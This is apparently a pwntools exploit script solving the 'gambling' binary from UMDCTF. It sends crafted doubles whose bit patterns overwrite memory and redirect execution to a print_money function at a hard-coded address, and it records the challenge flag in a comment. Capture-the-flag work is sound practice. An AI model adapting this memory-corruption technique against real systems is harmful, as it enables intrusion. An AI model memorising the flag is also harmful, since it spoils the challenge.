#!/usr/bin/env python3
from pwn import *
import struct
# Target binary; pwntools derives arch/bits/endianness for its helpers from context.binary.
context.binary = elf = ELF("./gambling_patched")
# Debugger pane: tmux horizontal split taking 70% of the window.
context.terminal = "tmux splitw -hp 70".split()
# context.log_level = "debug"
# gdb commands handed to gdb.debug() when the script is run with GDB=1.
gs = '''
b *gamble + 81
continue
'''
def start():
    """Open the target tube.

    REMOTE=1 connects to the hosted challenge; GDB=1 launches the local
    binary under gdb with the `gs` script; otherwise a plain local process.
    """
    if args.REMOTE:
        return remote("challs.umdctf.io", 31005)
    argv = [elf.path]
    if args.GDB:
        return gdb.debug(argv, gdbscript=gs)
    return process(argv)
r = start()  # the live tube that every helper below (rcu/sa/sla/sl) talks to
def rcu(d1, d2=0):
    """Discard everything received up to and including *d1*.

    When *d2* is truthy, additionally read up to (but not including) *d2*
    and return those bytes; with the default *d2* (0) or any falsy value,
    return None.
    """
    r.recvuntil(d1, drop=True)
    if not d2:
        return None
    return r.recvuntil(d2, drop=True)
def libcbase():
    """Log the resolved libc base address.

    NOTE(review): `libc` is never bound anywhere in this file, so calling this
    raises NameError unless a caller defines it first; it is unused here.
    """
    return log.info("libc base = %#x" % libc.address)


def logleak(name, val):
    """Log *val* in hex under the label *name*."""
    return log.info(name + " = %#x" % val)


def sa(delim, data):
    """Send *data* once *delim* has been received."""
    return r.sendafter(delim, data)


def sla(delim, line):
    """Send *line* followed by a newline once *delim* has been received."""
    return r.sendlineafter(delim, line)


def sl(line):
    """Send *line* followed by a newline."""
    return r.sendline(line)


def bc(value):
    """ASCII-encode str(value) so it can be written to the tube."""
    return str(value).encode("ascii")


def demangle_base(value):
    """Shift a (value >> 12) quantity back into a page-aligned address."""
    return value << 12


def remangle(heap_base, value):
    """Return (heap_base >> 12) ^ value.

    Looks like the glibc safe-linking pointer-protection formula; unused in
    this script.
    """
    return (heap_base >> 12) ^ value
def int_to_double(x: int) -> float:
    """Reinterpret the 64-bit pattern *x* as an IEEE-754 double.

    This is a bit-cast, not a numeric conversion: both formats are packed
    and unpacked little-endian. Raises struct.error if *x* is outside
    0 .. 2**64 - 1.
    """
    # '<Q' and '<d' are both 8 bytes, so the round-trip preserves every bit.
    raw = struct.pack("<Q", x)
    (as_double,) = struct.unpack("<d", raw)
    return as_double
#========= exploit here ===================
# Seven 64-bit patterns; each is sent as the decimal text of the double that
# shares its bits (see int_to_double and bc above).
a = int_to_double(0x1111111111111111)
b = int_to_double(0x2222222222222222)
c = int_to_double(0x3333333333333333)
d = int_to_double(0x4444444444444444)
e = int_to_double(0x5555555555555555)
f = int_to_double(0x6666666666666666)
# g repeats the 32-bit value 0x080492c0 in both halves.
g = int_to_double(0x080492c0080492c0)
#0x080492c0 print_money()
# First answer goes after the prompt; the rest are sent as plain lines with a
# short pause between them, presumably so the target consumes each line
# separately — TODO confirm the pause is actually needed.
sla(b"ucky numbers:", bc(a))
sleep(0.1)
sl(bc(b))
sleep(0.1)
sl(bc(c))
sleep(0.1)
sl(bc(d))
sleep(0.1)
sl(bc(e))
sleep(0.1)
sl(bc(f))
sleep(0.1)
sl(bc(g))
#UMDCTF{99_percent_of_pwners_quit_before_they_get_a_shell_congrats_on_being_the_1_percent}
#========= interactive ====================
# Hand the tube over to the user.
r.interactive()